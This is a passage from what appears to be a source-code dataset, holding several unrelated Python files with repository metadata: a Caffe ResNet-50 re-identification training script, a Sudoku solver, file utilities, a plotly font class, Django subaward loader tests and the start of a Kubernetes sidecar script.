pase_name = base_name
base_name = base_name + post
if (in_c != out_c):
#param = pase_name + '_branch1'
net['res'+base_name+'_branch1'], net['bn'+base_name+'_branch1'], net['scale'+base_name+'_branch1'] = \
conv_bn_scale(bottom, 1, out_c, stride=stride, is_train=is_train, has_relu=False, bias_term=False)
#conv_bn_scale(bottom, 1, out_c, base_param_name=param, stride=stride, is_train=is_train, has_relu=False, bias_term=False)
identity = net['scale'+base_name+'_branch1']
else:
identity = bottom
#param = pase_name + '_branch2a'
net['res'+base_name+'_branch2a'], net['bn'+base_name+'_branch2a'], net['scale'+base_name+'_branch2a'], net['res'+base_name+'_branch2a_relu'] = \
conv_bn_scale(bottom, 1, out_c/4, stride=stride, is_train=is_train, has_relu=True, bias_term=False)
#conv_bn_scale(bottom, 1, out_c/4, base_param_name=param, stride=stride, is_train=is_train, has_relu=True, bias_term=False)
#param = pase_name + '_branch2b'
net['res'+base_name+'_branch2b'], net['bn'+base_name+'_branch2b'], net['scale'+base_name+'_branch2b'], net['res'+base_name+'_branch2b_relu'] = \
conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, pad=1, is_train=is_train, has_relu=True, bias_term=False)
#conv_bn_scale(net['res'+base_name+'_branch2a_relu'], 3, out_c/4, base_param_name=param, pad=1, is_train=is_train, has_relu=True, bias_term=False)
#param = pase_name + '_branch2c'
net['res'+base_name+'_branch2c'], net['bn'+base_name+'_branch2c'], net['scale'+base_name+'_branch2c'] = \
conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, is_train=is_train, has_relu=False, bias_term=False)
#conv_bn_scale(net['res'+base_name+'_branch2b_relu'], 1, out_c, base_param_name=param, is_train=is_train, has_relu=False, bias_term=False)
final = net['scale'+base_name+'_branch2c']
net['res'+base_name] = L.Eltwise(identity, final)
net['res'+base_name+'_relu'] = L.ReLU(net['res'+base_name], in_place=True)
final_name = 'res'+base_name+'_relu'
return net, final_name
def res50_body(net, data, post, is_train):
net['conv1'+post], net['bn_conv1'+post], net['scale_conv1'+post], net['conv1_relu'+post] = \
conv_bn_scale(net[data], 7, 64, pad = 3, stride = 2, is_train=is_train, has_relu=True)
net['pool1'+post] = max_pool(net['conv1_relu'+post], 3, stride=2)
names, outs = ['2a', '2b', '2c'], [256, 256, 256]
pre_out = 64
final = 'pool1'+post
for (name, out) in zip(names, outs):
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names, outs = ['3a', '3b', '3c', '3d'], [512, 512, 512, 512]
for (name, out) in zip(names, outs):
if (name == '3a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names = ['4a', '4b', '4c', '4d', '4e', '4f']
out = 1024
for name in names:
if (name == '4a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
names = ['5a', '5b', '5c']
out = 2048
for name in names:
if (name == '5a'):
net, final = res_unit(net, net[final], pre_out, out, 2, name, post, is_train=is_train)
else:
net, final = res_unit(net, net[final], pre_out, out, 1, name, post, is_train=is_train)
pre_out = out
net['pool5'+post] = ave_pool(net[final], 7, 1)
final = 'pool5'+post
return net, final
# main netspec wrapper
def res50_train(mean_value, list_file, is_train=True):
# setup the python data layer
net = caffe.NetSpec()
net.data, net.label \
= L.ReidData(transform_param=dict(mirror=True,crop_size=224,mean_value=mean_value),
reid_data_param=dict(source=list_file,batch_size=16,new_height=256,new_width=256,
pos_fraction=1,neg_fraction=1,pos_limit=1,neg_limit=4,pos_factor=1,neg_factor=1.01),
ntop = 2)
net, final = res50_body(net, 'data', '', is_train)
net['score'] = fc_relu(net[final], nout=751, is_train=is_train, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=is_train, has_relu=False)
net['loss'] = L.SoftmaxWithLoss(net['score'], net['label'] , propagate_down=[1,0], loss_weight=1)
net['loss_dif'] = L.SoftmaxWithLoss(net['score_dif'], net['label_dif'], propagate_down=[1,0], loss_weight=0.5)
return str(net.to_proto())
def res50_dev(data_param = dict(shape=dict(dim=[2, 3, 224, 224])), label_param = dict(shape=dict(dim=[2]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = data_param)
net['label'] = L.Input(input_param = label_param)
net, final = res50_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['euclidean'], net['label_dif'] = L.PairEuclidean(net[final], net['label'], ntop = 2)
net['score_dif'] = fc_relu(net['euclidean'], nout=2, is_train=False, has_relu=False)
return str(net.to_proto())
def res50_score(input_param = dict(shape=dict(dim=[1, 3, 224, 224]))):
# setup the python data layer
net = caffe.NetSpec()
net['data'] = L.Input(input_param = input_param)
net, final = res50_body(net, 'data', '', is_train=False)
net['score'] = fc_relu(net[final], nout=751, is_train=False, has_relu=False)
net['prediction'] = L.Softmax(net['score'])
return str(net.to_proto())
workdir = osp.join(osp.dirname(__file__), 'res50')
if not os.path.isdir(workdir):
os.makedirs(workdir)
logdir = osp.join(workdir, 'log')
if not os.path.isdir(logdir):
os.makedirs(logdir)
snapshotdir = osp.join(workdir, 'snapshot')
if not os.path.isdir(snapshotdir):
os.makedirs(snapshotdir)
print('Work Dir : {}'.format(workdir))
train_proto = osp.join(workdir, "train.proto")
solverproto = tools.CaffeSolver(trainnet_prototxt_path = train_proto, testnet_prototxt_path = None)
solverproto.sp['display'] = "100"
solverproto.sp['base_lr'] = "0.001"
solverproto.sp['stepsize'] = "16000"
solverproto.sp['max_iter'] = "18000"
solverproto.sp['snapshot'] = "1000"
solverproto.sp['iter_size'] = "4"
solverproto.sp['snapshot_prefix'] = "\"{}/snapshot/res50.full\"".format(workdir)
solverproto.write(osp.join(workdir, 'solver.proto'))
list_file = 'examples/market1501/lists/train.lst'
mean_value = [97.8286, 99.0468, 105.606]
# write train net.
with open(train_proto, 'w') as f:
f.write(res50_train(mean_value, list_file, True))
dev_proto = osp.join(workdir, "dev.proto")
with open(dev_proto, 'w') as f:
f.write(res50_score())
dep_proto = osp.join(workdir, "deploy.proto")
with open(dep_proto, 'w') as f:
f.write(res50_dev())
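# Typical launch once the protos are written (assumption: stock Caffe CLI and an
# ImageNet-pretrained ResNet-50 caffemodel downloaded locally; adjust paths):
#
#   ./build/tools/caffe train \
#       -solver models/market1501/res50/solver.proto \
#       -weights ResNet-50-model.caffemodel \
#       -gpu 0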
| 44.071856 | 153 | 0.670516 |
5afe4acc19c3deff0621391e914c850fd9d6e5e9 | 4,126 | py | Python | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | leetcode/python/sudokuSolver.py | yaoxuanw007/forfun | db50bd40852d49bd68bae03ceb43cb4a901c6d37 | [
"MIT"
] | null | null | null | # https://oj.leetcode.com/problems/sudoku-solver/
class Solution:
# @param board, a 9x9 2D array
# Solve the Sudoku by modifying the input board in-place.
# Do not return any value.
def solveSudoku(self, board):
if len(board) == 0 or len(board[0]) == 0:
return
m, n = len(board), len(board[0])
for i in xrange(m):
board[i] = [x for x in board[i]]
self.solve(board, m, n)
for i in xrange(m):
board[i] = ''.join(board[i])
def solve(self, board, m, n):
for i in xrange(m):
for j in xrange(n):
if board[i][j] == '.':
for k in xrange(1, 10):
board[i][j] = str(k)
if self.isValid(board, i, j) and self.solve(board, m, n):
return True
board[i][j] = '.'
return False
return True
def isValid(self, board, x, y):
# 1*9
flags = [False] * 9
for i in xrange(9):
if board[x][i] != '.':
num = int(board[x][i]) - 1
if flags[num]:
return False
flags[num] = True
# 9*1
flags = [False] * 9
for i in xrange(9):
if board[i][y] != '.':
num = int(board[i][y]) - 1
if flags[num]:
return False
flags[num] = True
# 3*3
flags = [False] * 9
r, c = x/3, y/3
for i in xrange(3):
for j in xrange(3):
if board[r*3+i][c*3+j] != '.':
num = int(board[r*3+i][c*3+j]) - 1
if flags[num]:
return False
flags[num] = True
return True
import pprint as pp
# Pass OJ !!
class Solution1:
# @param board, a 9x9 2D array
# Solve the Sudoku by modifying the input board in-place.
# Do not return any value.
def solveSudoku(self, board):
if len(board) == 0 or len(board[0]) == 0:
return
m, n = len(board), len(board[0])
for i in xrange(m):
board[i] = [x for x in board[i]]
self.createBoardAvail(board, m, n)
self.solve(board, m, n)
for i in xrange(m):
board[i] = ''.join(board[i])
def createBoardAvail(self, board, m, n):
self.boardAvail = [[None]*n for i in xrange(m)]
for x in xrange(m):
for y in xrange(n):
self.boardAvail[x][y] = set([str(k) for k in range(1,10)])
for x in xrange(m):
for y in xrange(n):
self.removeBoardAvail(board, x, y)
# pp.pprint(self.boardAvail)
def removeBoardAvail(self, board, x, y, boardDelta=None):
if board[x][y] != '.':
for i in xrange(9):
if board[x][y] in self.boardAvail[i][y]:
if boardDelta:
boardDelta[i][y] = True
self.boardAvail[i][y].remove(board[x][y])
for i in xrange(9):
if board[x][y] in self.boardAvail[x][i]:
if boardDelta:
boardDelta[x][i] = True
self.boardAvail[x][i].remove(board[x][y])
r, c = x//3, y//3
for i in xrange(3):
for j in xrange(3):
if board[x][y] in self.boardAvail[r*3+i][c*3+j]:
if boardDelta:
boardDelta[r*3+i][c*3+j] = True
self.boardAvail[r*3+i][c*3+j].remove(board[x][y])
def addBoardAvail(self, board, x, y, boardDelta):
if board[x][y] != '.':
for i in xrange(9):
for j in xrange(9):
if boardDelta[i][j]:
boardDelta[i][j] = False
self.boardAvail[i][j].add(board[x][y])
def solve(self, board, m, n):
for x in xrange(m):
for y in xrange(n):
if board[x][y] == '.':
boardDelta = [[False]*n for i in xrange(m)]
for num in [str(n) for n in xrange(1, 10)]:
if num in self.boardAvail[x][y]:
board[x][y] = num
self.removeBoardAvail(board, x, y, boardDelta)
# pp.pprint([board, self.boardAvail])
if self.solve(board, m, n):
return True
self.addBoardAvail(board, x, y, boardDelta)
board[x][y] = '.'
return False
return True
# Test
s = Solution1()
board = [".87654329","2........","3........","4........","5........","6........","7........","8........","9........"]
s.solveSudoku(board)
print board
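# Quick sanity check (illustrative): every row, column and 3x3 box of the solved
# board must contain the digits 1-9 exactly once.
def check_solved(board):
  rows = all(len(set(row)) == 9 and '.' not in row for row in board)
  cols = all(len(set(board[i][j] for i in xrange(9))) == 9 for j in xrange(9))
  boxes = all(len(set(board[r*3+i][c*3+j] for i in xrange(3) for j in xrange(3))) == 9
              for r in xrange(3) for c in xrange(3))
  return rows and cols and boxes
print check_solved(board)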
| 29.683453 | 117 | 0.509937 |
b70863d7f362b687c4a64a93c1d8949441eff751 | 3,039 | py | Python | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | rltorch/utils/file_utils.py | Jjschwartz/rltorch | eeb2ad955f018d768db98c4a2be5da96a75579f6 | [
"MIT"
] | null | null | null | """This module contains general file handling functions, common to
multiple packages.
"""
import os
import yaml
import shutil
import pathlib
import tempfile
import os.path as osp
def load_yaml(file_path):
"""Load yaml file located at file path, throws error if theres an issue
loading file.
"""
with open(file_path) as fin:
content = yaml.load(fin, Loader=yaml.FullLoader)
return content
def write_yaml(file_path, data):
"""Write a dictionary to yaml file """
with open(file_path, "w") as fout:
yaml.dump(data, fout)
def get_file_name(file_path):
"""Extracts the file or directory name from a file path, removing
extension.
"""
full_file_name = file_path.split(os.sep)[-1]
file_name = full_file_name.split(".")[0]
return file_name
def get_dir_name(path):
"""Get the name of top level directory in path. """
if osp.isfile(path):
return osp.basename(osp.dirname(path))
return osp.basename(osp.abspath(path))
def get_parent_dir_path(path):
"""Returns the path to the parent directory in path. """
if osp.isfile(path):
return osp.dirname(path)
return osp.dirname(osp.abspath(path))
def make_dir(dir_path, msg=None):
"""Makes a new directory at given path, or prints warning if one already
exists.
"""
if osp.exists(dir_path):
if msg is None:
print(f"WARNING: dir {dir_path} already exists.")
else:
print(f"WARNING: {msg}")
pathlib.Path(dir_path).mkdir(exist_ok=True)
def setup_sub_dir(parent_dir, sub_dir):
"""Setup save directory for single episode trace """
new_dir = osp.join(parent_dir, sub_dir)
make_dir(new_dir, f"sub dir already exists, storing there any way")
return new_dir
def generate_file_path(parent_dir, file_name, extension):
"""Generates a full file path from a parent directory, file name and
file extension.
"""
if extension[0] != ".":
extension = "." + extension
return osp.join(parent_dir, file_name + extension)
def replace_extension(file_path, extension):
"""Generate a new file path from existing file path and new extension """
split_path = file_path.rsplit(".", 1)
return ".".join([split_path[0], extension])
def get_all_files_from_dir(dir, extension=None):
"""Returns full file paths of all files in directory with optional
filtering by file extension.
"""
file_list = os.listdir(dir)
files = []
for file_name in file_list:
if extension is None or extension in file_name:
files.append(osp.join(dir, file_name))
return files
def get_tmp_file(suffix=None):
"""Returns full path to a temporary file.
Suffix is optional file ending (e.g. .txt). Must include '.' if required.
"""
with tempfile.NamedTemporaryFile(suffix=suffix) as temp_file:
return temp_file.name
def move_dirs_into_parent_dir(dir_paths, parent_dir):
make_dir(parent_dir)
for d in dir_paths:
shutil.move(d, parent_dir)
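# Usage sketch (illustrative helper): composing the functions above on a scratch
# directory.
def _example_file_utils_roundtrip():
    scratch = tempfile.mkdtemp()
    results_dir = setup_sub_dir(scratch, "results")
    cfg_path = generate_file_path(results_dir, "config", "yaml")
    write_yaml(cfg_path, {"seed": 1})
    assert load_yaml(cfg_path) == {"seed": 1}
    assert get_all_files_from_dir(results_dir, ".yaml") == [cfg_path]
    shutil.rmtree(scratch)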
| 28.138889 | 77 | 0.679171 |
7f34b6324813a0e3e136adf01ab4f615d4141d37 | 5,045 | py | Python | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 11,750 | 2015-10-12T07:03:39.000Z | 2022-03-31T20:43:15.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,951 | 2015-10-12T00:41:25.000Z | 2022-03-31T22:19:26.000Z | env/lib/python3.8/site-packages/plotly/graph_objs/scattergl/selected/_textfont.py | acrucetta/Chicago_COVI_WebApp | a37c9f492a20dcd625f8647067394617988de913 | [
"MIT",
"Unlicense"
] | 2,623 | 2015-10-15T14:40:27.000Z | 2022-03-28T16:05:50.000Z | from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Textfont(_BaseTraceHierarchyType):
# class properties
# --------------------
_parent_path_str = "scattergl.selected"
_path_str = "scattergl.selected.textfont"
_valid_props = {"color"}
# color
# -----
@property
def color(self):
"""
Sets the text font color of selected points.
The 'color' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
Returns
-------
str
"""
return self["color"]
@color.setter
def color(self, val):
self["color"] = val
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
color
Sets the text font color of selected points.
"""
def __init__(self, arg=None, color=None, **kwargs):
"""
Construct a new Textfont object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.scattergl.selected.Textfont`
color
Sets the text font color of selected points.
Returns
-------
Textfont
"""
super(Textfont, self).__init__("textfont")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.scattergl.selected.Textfont
constructor must be a dict or
an instance of :class:`plotly.graph_objs.scattergl.selected.Textfont`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("color", None)
_v = color if color is not None else _v
if _v is not None:
self["color"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
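# Usage sketch (illustrative): this nested object is normally reached through a
# trace constructor rather than instantiated directly.
def _example_selected_textfont():
    import plotly.graph_objects as go
    return go.Figure(
        go.Scattergl(
            x=[1, 2, 3],
            y=[3, 1, 2],
            mode="markers+text",
            text=["a", "b", "c"],
            selected=dict(textfont=dict(color="crimson")),
        )
    )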
| 36.294964 | 82 | 0.557185 |
71de53558c42e2ff9effe10bcb500ec533beb54c | 10,487 | py | Python | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | ["CC0-1.0"] | null | null | null | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | ["CC0-1.0"] | 1 | 2021-11-15T17:54:12.000Z | 2021-11-15T17:54:12.000Z | usaspending_api/broker/tests/integration/test_load_fsrs_mgmt_cmd.py | mikepsinn/usaspending-api | ef61e13c286eb51949e16b760fa7516255b2bfd3 | ["CC0-1.0"] | null | null | null |
# Stdlib imports
# Core Django imports
from django.core.management import call_command
# Third-party app imports
import pytest
from unittest.mock import MagicMock
from model_mommy import mommy
# Imports from your apps
from usaspending_api.awards.models import Award, Subaward, TransactionNormalized
from usaspending_api.references.models import Agency, SubtierAgency
from usaspending_api.recipient.models import RecipientLookup
DB_CURSOR_PARAMS = {
'default': MagicMock(),
'data_broker': MagicMock(),
'data_broker_data_file': 'usaspending_api/broker/tests/data/broker_subawards.json'
}
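# These params are handed to the mock_db_cursor fixture via the indirect parametrization
# on the tests below; 'data_broker_data_file' points at a JSON file of canned broker
# subaward rows that the load_fsrs command ingests.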
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_no_associated_awards(mock_db_cursor):
"""
Test the subaward load as if it were happening for the first time on an empty table, with no awards to link to
"""
mommy.make(RecipientLookup, duns='PARENTDUNS54321', legal_business_name='WIZARD SCHOOLS')
call_command('load_fsrs')
expected_results = {
'count': 3,
'awards': [None, None, None],
'recipient_names': ["JJ'S DINER", 'HARRY POTTER', 'HARRY POTTER'],
'ppop_city_names': ['PAWNEE', '', ''],
'subaward_descs': ['RANDOM DESCRIPTION TEXT', 'HOGWARTS ACCEPTANCE LETTER',
'HOGWARTS ACCEPTANCE LETTER REVISED'],
'duns': ['DUNS12345', 'DUNS54321', 'DUNS54321'],
'dba_names': ["JJ'S", "HOGWARTS", "HOGWARTS"],
'parent_recipient_names': ["PARENT JJ'S DINER", "WIZARD SCHOOLS", "WIZARD SCHOOLS"],
'broker_award_ids': [10, 20, 30],
'internal_ids': ['PROCUREMENT_INTERNAL_ID', 'GRANT_INTERNAL_ID_1', 'GRANT_INTERNAL_ID_2'],
}
actual_results = {
'count': Subaward.objects.count(),
'awards': list(Subaward.objects.values_list('award', flat=True)),
'recipient_names': list(Subaward.objects.values_list('recipient_name', flat=True)),
'ppop_city_names': list(Subaward.objects.values_list('pop_city_name', flat=True)),
'subaward_descs': list(Subaward.objects.values_list('description', flat=True)),
'duns': list(Subaward.objects.values_list('recipient_unique_id', flat=True)),
'dba_names': list(Subaward.objects.values_list('dba_name', flat=True)),
'parent_recipient_names': list(Subaward.objects.values_list('parent_recipient_name', flat=True)),
'broker_award_ids': list(Subaward.objects.values_list('broker_award_id', flat=True)),
'internal_ids': list(Subaward.objects.values_list('internal_id', flat=True)),
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_exact_match(mock_db_cursor):
"""
    Test the subaward load linking to existing awards whose identifiers exactly match the incoming subawards
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN54321',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 100, 100]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_with_dashes(mock_db_cursor):
"""
    Test the subaward load linking to existing awards whose FAIN identifiers contain dashes
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN-54321',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 100, 100]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_fresh_subaward_load_associated_awards_multiple_matching_fains(mock_db_cursor):
"""
    Test the subaward load when multiple awards match the same FAIN; the award with the most recent date_signed should be linked
"""
# "CONT_AW_" + agency_id + referenced_idv_agency_iden + piid + parent_award_id
# "CONT_AW_" + contract_agency_code + contract_idv_agency_code + contract_number + idv_reference_number
models_to_mock = [
{
'model': Award,
'id': 50,
'generated_unique_award_id': 'CONT_AW_12345_12345_PIID12345_IDV12345',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-02',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': Award,
'id': 100,
'fain': 'FAIN-54321',
'date_signed': '1700-01-01',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
}
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'count': 3,
'award_ids': [50, 99, 99]
}
actual_results = {
'count': Subaward.objects.count(),
'award_ids': list(Subaward.objects.values_list('award_id', flat=True))
}
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_subaward_update(mock_db_cursor):
"""
Test the subaward load as if a subaward is already in there with the same internal id, delete/update it
"""
models_to_mock = [
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-03',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
},
{
'id': 5,
'model': Subaward,
'subaward_number': 'SUBNUM54322',
'internal_id': 'GRANT_INTERNAL_ID_1',
'broker_award_id': 1,
'award_type': 'grant',
'award_id': 99,
'amount': 2,
'action_date': '2014-01-01'
},
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'subaward_number': 'SUBNUM54321',
'amount': 54321,
'action_date': '1212-12-12'
}
actual_results = Subaward.objects.filter(internal_id='GRANT_INTERNAL_ID_1').values(*expected_results)[0]
actual_results['action_date'] = str(actual_results['action_date'])
assert expected_results == actual_results
@pytest.mark.django_db
@pytest.mark.parametrize('mock_db_cursor', [DB_CURSOR_PARAMS.copy()], indirect=True)
def test_subaward_broken_links(mock_db_cursor):
"""
Test the subaward load as if a subaward has been loaded w/o a parent award and now the parent award is available
"""
models_to_mock = [
{
'model': Award,
'id': 99,
'fain': 'FAIN54321',
'date_signed': '1700-01-03',
'latest_transaction': mommy.make(TransactionNormalized)
},
{
'model': SubtierAgency,
'subtier_agency_id': 1,
'subtier_code': '12345'
},
{
'model': Agency,
'subtier_agency_id': 1
},
{
'id': 5,
'model': Subaward,
'subaward_number': 'SUBNUM54322',
'internal_id': 'GRANT_INTERNAL_ID_1',
'broker_award_id': 100,
'award_type': 'grant',
'award_id': None,
'amount': 2,
'action_date': '2014-01-01'
},
]
for entry in models_to_mock:
mommy.make(entry.pop('model'), **entry)
call_command('load_fsrs')
expected_results = {
'award_id': 99,
}
actual_results = Subaward.objects.filter(id=5).values(*expected_results)[0]
assert expected_results == actual_results
| 31.778788 | 116 | 0.610089 |
ba66a14c1c6f88c6164494a5ee094ce9e5a478f6 | 3,115 | py | Python | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | ["Apache-2.0"] | null | null | null | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | ["Apache-2.0"] | 14 | 2020-09-26T01:27:23.000Z | 2022-02-10T02:14:54.000Z | applications/ps-sidecar/main.py | awesome-archive/nauta | 6ba6103421a10dfcd051aef3f7c5a714f6ac9429 | ["Apache-2.0"] | null | null | null |
#
# Copyright (c) 2019 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging as log
from os import getenv
from sys import exit
from time import sleep
from kubernetes import client, config
from kubernetes.client import V1Pod, V1ObjectMeta
JOB_SUCCESS_CONDITION = "Succeeded"
LOGGING_LEVEL_MAPPING = {"DEBUG": log.DEBUG, "INFO": log.INFO, "WARNING": log.WARNING, "ERROR": log.ERROR,
"CRITICAL": log.CRITICAL}
logging_level_str = getenv("LOGGING_LEVEL")
if logging_level_str is None:
raise RuntimeError("LOGGING_LEVEL env var is not defined!")
if logging_level_str not in LOGGING_LEVEL_MAPPING.keys():
raise RuntimeError("LOGGING_LEVEL env var must be set to one out of {}. Current value: {}"
.format(LOGGING_LEVEL_MAPPING.keys(), logging_level_str))
log.basicConfig(level=logging_level_str)
log.critical("Ps sidecar log level set to: " + logging_level_str)
config.load_incluster_config()
my_pod_name = getenv("MY_POD_NAME")
if my_pod_name is None:
raise RuntimeError("MY_POD_NAME env var is not defined!")
